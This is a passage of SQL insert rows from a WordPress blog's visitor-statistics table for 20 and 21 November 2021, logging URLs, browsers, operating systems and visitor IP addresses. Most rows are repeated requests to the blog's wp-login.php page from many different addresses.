(15291,'2021-11-20','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.101.37.188','000',0,1,0),
(15292,'2021-11-20','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.118.170.124','000',0,1,0),
(15293,'2021-11-20','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.134.83.128','000',0,1,0),
(15294,'2021-11-20','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','54.91.186.130','000',0,1,0),
(15295,'2021-11-20','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.188.107.215','000',0,1,0),
(15296,'2021-11-20','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.133.87.86','000',0,1,0),
(15297,'2021-11-20','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.191.232.145','000',0,1,0),
(15298,'2021-11-20','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.222.208.251','000',0,1,0),
(15299,'2021-11-20','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.117.155.234','000',0,1,0),
(15300,'2021-11-20','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.144.78.94','000',0,1,0),
(15301,'2021-11-20','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.191.42.20','000',0,1,0),
(15302,'2021-11-20','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.163.106','000',0,1,0),
(15303,'2021-11-20','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','217.69.6.41','000',0,1,0),
(15304,'2021-11-20','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','142.93.44.71','000',0,1,0),
(15305,'2021-11-20','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.76.141.127','000',0,1,0),
(15306,'2021-11-20','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.221.188.81','000',0,1,0),
(15307,'2021-11-20','http://82.102.9.14:80/blog','Unknown','Unknown','Unknown',NULL,NULL,'','60.217.75.69','000',0,2,0),
(15308,'2021-11-20','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.188.141.97','000',0,1,0),
(15309,'2021-11-20','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.138.173.224','000',0,1,0),
(15310,'2021-11-20','https://uk.search.yahoo.com/','Chrome','Windows','6.2',NULL,NULL,'','190.236.14.146','000',0,2,0),
(15311,'2021-11-20','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.188.65.70','000',0,1,0),
(15312,'2021-11-20','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.144.213.62','000',0,1,0),
(15313,'2021-11-20','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.191.95.38','000',0,1,0),
(15314,'2021-11-20','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','52.15.127.4','000',0,1,0),
(15315,'2021-11-20','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.144.120.34','000',0,1,0),
(15316,'2021-11-20','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','13.57.36.75','000',0,1,0),
(15317,'2021-11-20','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.139.59.206','000',0,1,0),
(15318,'2021-11-20','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.134.253.208','000',0,1,0),
(15319,'2021-11-20','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.12.104.163','000',0,1,0),
(15320,'2021-11-20','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.117.240.202','000',0,1,0),
(15321,'2021-11-20','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.139.55.145','000',0,1,0),
(15322,'2021-11-20','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','52.14.6.30','000',0,1,0),
(15323,'2021-11-20','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.224.72.170','000',0,1,0),
(15324,'2021-11-20','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','13.58.149.167','000',0,1,0),
(15325,'2021-11-20','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.191.7.73','000',0,1,0),
(15326,'2021-11-20','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.135.64.197','000',0,1,0),
(15327,'2021-11-20','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','13.59.72.188','000',0,1,0),
(15328,'2021-11-20','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.222.35.68','000',0,1,0),
(15329,'2021-11-20','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.218.210.102','000',0,1,0),
(15330,'2021-11-20','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','54.183.187.13','000',0,1,0),
(15331,'2021-11-20','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','162.221.192.26','000',0,2,0),
(15332,'2021-11-20','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.144.171.55','000',0,1,0),
(15333,'2021-11-20','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.220.50.199','000',0,1,0),
(15334,'2021-11-20','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','144.48.168.251','000',0,5,0),
(15335,'2021-11-20','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.221.230.110','000',0,1,0),
(15336,'2021-11-20','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.19.31.86','000',0,1,0),
(15337,'2021-11-20','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.19.79.125','000',0,1,0),
(15338,'2021-11-20','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','13.58.110.90','000',0,1,0),
(15339,'2021-11-20','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.220.48.109','000',0,1,0),
(15340,'2021-11-20','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','52.15.40.176','000',0,1,0),
(15341,'2021-11-20','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.139.57.249','000',0,1,0),
(15342,'2021-11-20','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.188.225.250','000',0,1,0),
(15343,'2021-11-20','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','138.197.217.198','000',0,4,0),
(15344,'2021-11-20','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.21.75.35','000',0,1,0),
(15345,'2021-11-20','https://www.google.com/','Samsung Internet','Android','9',NULL,NULL,'','142.202.48.80','000',0,2,0),
(15346,'2021-11-20','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.218.166.133','000',0,1,0),
(15347,'2021-11-20','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.222.183.71','000',0,1,0),
(15348,'2021-11-20','http://82.102.9.14:80/blog','360 Safe Explorer','Windows','6.1',NULL,NULL,'','183.136.225.9','000',0,4,0),
(15349,'2021-11-20','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','13.57.205.195','000',0,1,0),
(15350,'2021-11-20','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.217.92.167','000',0,1,0),
(15351,'2021-11-20','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.217.201.147','000',0,1,0),
(15352,'2021-11-20','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.223.30.76','000',0,1,0),
(15353,'2021-11-20','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','54.219.141.34','000',0,1,0),
(15354,'2021-11-20','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.135.63.128','000',0,1,0),
(15355,'2021-11-20','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.145.26.204','000',0,1,0),
(15356,'2021-11-20','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.144.82.115','000',0,1,0),
(15357,'2021-11-20','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','52.53.151.222','000',0,1,0),
(15358,'2021-11-20','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.14.88.225','000',0,1,0),
(15359,'2021-11-20','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.216.226.223','000',0,1,0),
(15360,'2021-11-20','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','54.176.133.130','000',0,1,0),
(15361,'2021-11-20','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.234.205.29','000',0,1,0),
(15362,'2021-11-20','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.19.27.139','000',0,1,0),
(15363,'2021-11-20','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.144.177.172','000',0,1,0),
(15364,'2021-11-20','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.140.253.148','000',0,1,0),
(15365,'2021-11-20','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','54.85.249.73','000',0,1,0),
(15366,'2021-11-20','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.20.227.232','000',0,1,0),
(15367,'2021-11-20','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.220.67.216','000',0,1,0),
(15368,'2021-11-20','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.221.215.178','000',0,1,0),
(15369,'2021-11-21','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.17.132.146','000',0,1,0),
(15370,'2021-11-21','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.217.134.54','000',0,1,0),
(15371,'2021-11-21','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.216.204.27','000',0,1,0),
(15372,'2021-11-21','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.216.59.248','000',0,1,0),
(15373,'2021-11-21','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.220.122.81','000',0,1,0),
(15374,'2021-11-21','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.22.187.191','000',0,1,0),
(15375,'2021-11-21','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.142.47.103','000',0,1,0),
(15376,'2021-11-21','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.224.82.43','000',0,1,0),
(15377,'2021-11-21','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.218.114.153','000',0,1,0),
(15378,'2021-11-21','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.144.180.179','000',0,1,0),
(15379,'2021-11-21','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.220.80.13','000',0,1,0),
(15380,'2021-11-21','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','13.59.147.124','000',0,1,0),
(15381,'2021-11-21','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.19.79.169','000',0,1,0),
(15382,'2021-11-21','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.223.33.160','000',0,1,0),
(15383,'2021-11-21','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.216.186.234','000',0,1,0),
(15384,'2021-11-21','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.20.222.245','000',0,2,0),
(15385,'2021-11-21','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.217.29.96','000',0,1,0),
(15386,'2021-11-21','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.137.137.245','000',0,1,0),
(15387,'2021-11-21','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.145.0.151','000',0,4,0),
(15388,'2021-11-21','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.191.38.247','000',0,1,0),
(15389,'2021-11-21','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.117.223.50','000',0,1,0),
(15390,'2021-11-21','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.16.187.229','000',0,1,0),
(15391,'2021-11-21','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.131.141.117','000',0,1,0),
(15392,'2021-11-21','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.144.128.170','000',0,1,0),
(15393,'2021-11-21','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.129.17.250','000',0,1,0),
(15394,'2021-11-21','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.134.243.144','000',0,1,0),
(15395,'2021-11-21','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.188.168.233','000',0,1,0),
(15396,'2021-11-21','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.116.237.168','000',0,1,0),
(15397,'2021-11-21','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','54.151.23.68','000',0,1,0),
(15398,'2021-11-21','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.218.43.170','000',0,1,0),
(15399,'2021-11-21','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.224.72.34','000',0,1,0),
(15400,'2021-11-21','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.144.213.73','000',0,1,0),
(15401,'2021-11-21','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.191.188.121','000',0,1,0),
(15402,'2021-11-21','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.143.246.236','000',0,1,0),
(15403,'2021-11-21','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','51.254.59.113','000',0,1,0),
(15404,'2021-11-21','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.129.244.35','000',0,1,0),
(15405,'2021-11-21','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.144.198.0','000',0,1,0),
(15406,'2021-11-21','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','52.14.194.120','000',0,1,0),
(15407,'2021-11-21','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.22.175.66','000',0,1,0),
(15408,'2021-11-21','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.134.79.68','000',0,1,0),
(15409,'2021-11-21','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.14.149.61','000',0,1,0),
(15410,'2021-11-21','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.142.147.6','000',0,1,0),
(15411,'2021-11-21','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.188.50.68','000',0,1,0),
(15412,'2021-11-21','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.216.219.18','000',0,1,0),
(15413,'2021-11-21','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.119.1.145','000',0,1,0),
(15414,'2021-11-21','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.145.27.218','000',0,1,0),
(15415,'2021-11-21','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.218.163.80','000',0,1,0),
(15416,'2021-11-21','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','54.183.203.205','000',0,1,0),
(15417,'2021-11-21','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','54.173.4.83','000',0,1,0),
(15418,'2021-11-21','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.217.124.214','000',0,1,0),
(15419,'2021-11-21','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.218.210.102','000',0,1,0),
(15420,'2021-11-21','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.144.229.18','000',0,1,0),
(15421,'2021-11-21','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.142.143.175','000',0,1,0),
(15422,'2021-11-21','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.17.64.118','000',0,1,0),
(15423,'2021-11-21','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.118.104.216','000',0,1,0),
(15424,'2021-11-21','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.20.236.42','000',0,2,0),
(15425,'2021-11-21','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','52.15.238.227','000',0,1,0),
(15426,'2021-11-21','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.216.216.221','000',0,1,0),
(15427,'2021-11-21','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.15.19.158','000',0,1,0),
(15428,'2021-11-21','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.23.95.110','000',0,1,0),
(15429,'2021-11-21','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.143.225.152','000',0,1,0),
(15430,'2021-11-21','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.137.148.132','000',0,1,0),
(15431,'2021-11-21','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.144.245.140','000',0,1,0),
(15432,'2021-11-21','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.117.235.80','000',0,1,0),
(15433,'2021-11-21','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.143.253.68','000',0,1,0),
(15434,'2021-11-21','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.15.45.102','000',0,1,0),
(15435,'2021-11-21','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.144.166.199','000',0,1,0),
(15436,'2021-11-21','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.189.20.100','000',0,1,0),
(15437,'2021-11-21','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.117.193.23','000',0,1,0),
(15438,'2021-11-21','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.220.166.63','000',0,1,0),
(15439,'2021-11-21','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.219.206.20','000',0,2,0),
(15440,'2021-11-21','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.191.201.0','000',0,1,0),
(15441,'2021-11-21','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.223.99.228','000',0,1,0),
(15442,'2021-11-21','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.218.80.47','000',0,1,0),
(15443,'2021-11-21','http://ictbank.ir/blog/index.php/2020/11/03/fedora-33-problem-with-broadcom-wifi-device/','Chrome','Windows','10.0',NULL,NULL,'','46.161.11.64','000',0,8,0),
(15444,'2021-11-21','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.117.127.117','000',0,1,0),
(15445,'2021-11-21','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.118.213.29','000',0,1,0),
(15446,'2021-11-21','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.143.115.12','000',0,1,0),
(15447,'2021-11-21','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','45.158.15.145','000',0,1,0),
(15448,'2021-11-21','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.218.110.134','000',0,1,0),
(15449,'2021-11-21','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.219.189.128','000',0,1,0),
(15450,'2021-11-21','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','50.18.42.253','000',0,1,0),
(15451,'2021-11-21','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.141.194.63','000',0,1,0),
(15452,'2021-11-21','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.188.50.40','000',0,1,0),
(15453,'2021-11-21','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.219.231.189','000',0,1,0),
(15454,'2021-11-21','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.142.149.225','000',0,1,0),
(15455,'2021-11-21','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.15.181.93','000',0,1,0),
(15456,'2021-11-21','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.143.248.22','000',0,1,0),
(15457,'2021-11-21','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.144.32.249','000',0,1,0),
(15458,'2021-11-21','http://82.102.9.14/blog','Chrome','Windows','6.1',NULL,NULL,'','106.75.134.116','000',0,1,0),
(15459,'2021-11-21','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.145.21.193','000',0,1,0),
(15460,'2021-11-21','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.217.101.43','000',0,2,0),
(15461,'2021-11-21','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.131.85.22','000',0,1,0),
(15462,'2021-11-21','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.216.222.208','000',0,1,0),
(15463,'2021-11-21','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.224.24.155','000',0,1,0),
(15464,'2021-11-21','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.212.30.122','000',0,1,0),
(15465,'2021-11-21','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.15.177.128','000',0,1,0),
(15466,'2021-11-21','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.128.27.117','000',0,2,0),
(15467,'2021-11-21','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.188.116.199','000',0,1,0),
(15468,'2021-11-21','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.188.254.61','000',0,1,0),
(15469,'2021-11-21','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.216.219.87','000',0,1,0),
(15470,'2021-11-21','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','54.146.238.210','000',0,1,0),
(15471,'2021-11-21','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.191.169.114','000',0,1,0),
(15472,'2021-11-21','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.221.148.128','000',0,1,0),
(15473,'2021-11-21','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.139.96.190','000',0,1,0),
(15474,'2021-11-21','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.144.202.144','000',0,1,0),
(15475,'2021-11-21','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.222.248.36','000',0,1,0),
(15476,'2021-11-21','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.14.149.91','000',0,1,0),
(15477,'2021-11-21','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','54.183.61.98','000',0,1,0),
(15478,'2021-11-21','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.164.110','000',0,3,0),
(15479,'2021-11-21','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.19.57.248','000',0,1,0),
(15480,'2021-11-21','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.224.135.41','000',0,1,0),
(15481,'2021-11-21','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.118.101.22','000',0,1,0),
(15482,'2021-11-21','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.15.232.46','000',0,1,0),
(15483,'2021-11-21','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','178.155.5.227','000',0,4,0),
(15484,'2021-11-21','http://ictbank.ir/blog','Chrome','OS X','10.9.3',NULL,NULL,'','45.129.18.159','000',0,1,0),
(15485,'2021-11-21','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.224.212.0','000',0,1,0),
(15486,'2021-11-21','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.139.64.234','000',0,1,0),
(15487,'2021-11-21','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.118.132.74','000',0,1,0),
(15488,'2021-11-21','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.144.190.114','000',0,1,0),
(15489,'2021-11-21','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.222.240.238','000',0,1,0),
(15490,'2021-11-21','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.222.102.191','000',0,1,0),
(15491,'2021-11-21','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.117.155.234','000',0,1,0),
(15492,'2021-11-21','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.17.131.88','000',0,1,0),
(15493,'2021-11-21','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','52.53.167.53','000',0,1,0),
(15494,'2021-11-21','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.217.192.177','000',0,1,0),
(15495,'2021-11-21','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.220.163.211','000',0,1,0),
(15496,'2021-11-21','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','13.59.95.154','000',0,1,0),
(15497,'2021-11-21','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.21.19.54','000',0,1,0),
(15498,'2021-11-21','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.117.129.178','000',0,1,0),
(15499,'2021-11-21','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.188.34.90','000',0,1,0),
